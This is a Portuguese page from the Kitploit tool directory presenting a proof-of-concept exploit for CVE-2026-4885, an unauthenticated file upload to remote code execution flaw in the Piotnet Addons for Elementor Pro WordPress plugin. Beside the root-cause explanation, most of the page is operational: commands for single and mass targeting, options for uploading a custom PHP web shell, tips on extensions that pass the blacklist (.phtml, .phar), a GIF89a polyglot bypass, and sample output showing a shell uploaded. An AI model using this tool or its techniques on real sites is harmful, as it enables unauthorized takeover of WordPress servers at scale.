Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-4885 — Piotnet Addons for Elementor Pro <= 7.1.70 - Upload de Arquivo Arbitrário Não Autenticado → RCE | Kitploit
Ferramentas/GitHubGitHub/xshadow-here/cve-2026-4885
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoDesenvolvimento de Payloads
GitHubxshadow-here/cve-2026-4885

CVE-2026-4885

Piotnet Addons for Elementor Pro <= 7.1.70 - Upload de Arquivo Arbitrário Não Autenticado → RCE

Ver Repositório
1há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-4885

Piotnet Addons para Elementor Pro <= 7.1.70 - Upload de Arquivo Arbitrário Não Autenticado → RCE


Descrição:

O plugin Piotnet Addons for Elementor Pro para WordPress é vulnerável a upload arbitrário de arquivos devido à falta de validação do tipo de arquivo na função pafe_ajax_form_builder em todas as versões até, e incluindo, 7.1.70. O plugin usa uma lista negra de extensões incompleta que bloqueia apenas as extensões php, phpt, php5, php7 e exe, permitindo que extensões perigosas como .phar ou .phtml sejam enviadas livremente.

Isso possibilita que atacantes não autenticados façam upload de arquivos PHP arbitrários no servidor do site afetado, levando à Execução Remota de Código (RCE).

Nota: O exploit só pode ser acionado se um campo de arquivo for adicionado ao formulário Piotnet.


INFO: CVE-2026-4885

~ Pontuação CVSS: 9.8 (Crítico)

~ Vetor CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

~ Versões Afetadas: <= 7.1.70

~ Corrigido: Nenhum patch disponível

~ Publicado Publicamente: 18 de maio de 2026

  • Pesquisador: Wannes Verwimp
  • PoC por: Shadow & Friska 🩷

Causa Raiz:

O manipulador AJAX pafe_ajax_form_builder aceita uploads de arquivos sem validação adequada:

root@kitploit:~
// Lista negra incompleta — bloqueia apenas:
$blocked = ['php', 'phpt', 'php5', 'php7', 'exe'];

// .phtml, .phar, .shtml etc. passam livremente ✓

O caminho de upload pode ser vazado via ação AJAX pafe_export_database não autenticada → a exportação CSV contém URLs completas de arquivos.


Uso:

Menu interativo (padrão):

root@kitploit:~
python3 shadow.py
root@kitploit:~
  ╾────  MENU  ────╼

  1  ▶  um alvo
  2  ▶  varredura em massa
  3  ▶  sair

  [1/2/3] :

Alvo único (CLI):

root@kitploit:~
python3 shadow.py -u https://target.com
python3 shadow.py -u https://target.com -s shell.phtml

Alvos em massa (CLI):

root@kitploit:~
python3 shadow.py -f targets.txt -t 20
python3 shadow.py -f targets.txt -t 20 -s shell.phtml

Opções:

root@kitploit:~
-u, --url       URL do alvo
-f, --file      Arquivo com URLs de alvos (um por linha)
-s, --shell     Arquivo PHP de shell personalizado (GIF89a pré-anexado automaticamente)
-t, --threads   Threads concorrentes para modo em massa (padrão: 5)
-h, --help      Mostrar ajuda

Recursos:

  • 🩷 Menu totalmente interativo (um alvo / varredura em massa)
  • ⚡ Reconhecimento assíncrono paralelo — percorre páginas concorrentemente
  • 🔍 Descoberta automática de form_id, post_id, field_name a partir do HTML da página
  • 🪄 Bytes mágicos poliglotas GIF89a — bypass de verificações de tipo de imagem
  • 📡 Vazamento de URL via pafe_export_database (sem autenticação, sem nonce)
  • 🎯 Verificação de upload de shell (HTTP 200 + verificação de execução PHP)
  • 💾 Salvar resultados automaticamente em shell.txt
  • 🌐 Modo em massa com threads configuráveis + semáforo assíncrono
  • ⚠️ Aviso de extensão bloqueada exibido antes do prompt de upload

Shell:

Prepare seu arquivo de shell localmente (ex.: shadow.phtml) — os bytes mágicos GIF89a são pré-anexados automaticamente se ausentes.

Extensões bloqueadas: .php .phpt .php5 .php7 .exe

Use em vez disso: .phtml .phar .shtml .php8 etc.


Saída:

root@kitploit:~
╔══════════════════════════════════════════════════════════╗
║                                                          ║
║  ♡  CVE-2026-4885                                        ║
║  Piotnet Addons for Elementor Pro  <=  7.1.70            ║
║  Upload de Arquivo Não Autenticado  →  RCE               ║
║                                                          ║
║  por Shadow & Friska  ♡                                   ║
║                                                          ║
╚══════════════════════════════════════════════════════════╝

  ╾────  VERSÃO  ────╼
  ♡  v7.1.67 <= 7.1.70  —  VULNERÁVEL

  ╾────  RECON  ────╼
  ◆  escaneando 46 páginas (paralelo)...
  ♡  [PIOTNET]  https://target.com/contact
               post_id=9  |  form_id=72071c0
  ◆  usando   : https://target.com/contact

  ╾────  EXPLOIT  ────╼
  ◆  post_id=9  |  form_id=72071c0  |  field=file
  ▶  tentando .phtml ...
  ♡  enviado  (.phtml)
  ♡  URL vazada  : https://target.com/wp-content/uploads/piotnet-addons-for-elementor/shadow-xxx.phtml

  ╔══════════════════════════════════════════════════════════╗
  ║  ★  SHELL ENVIADO  (.phtml)                             ║
  ║                                                          ║
  ║  ◆  shell  : https://target.com/wp-content/...          ║
  ╚══════════════════════════════════════════════════════════╝

Requisitos:

root@kitploit:~
pip install httpx

Aviso Legal:

Esta ferramenta é apenas para fins de testes de segurança educacionais e autorizados.

O uso não autorizado contra sistemas que você não possui ou para os quais não tem permissão explícita para testar é ilegal. Os autores não são responsáveis por qualquer uso indevido ou danos causados por esta ferramenta.

Baixar ferramenta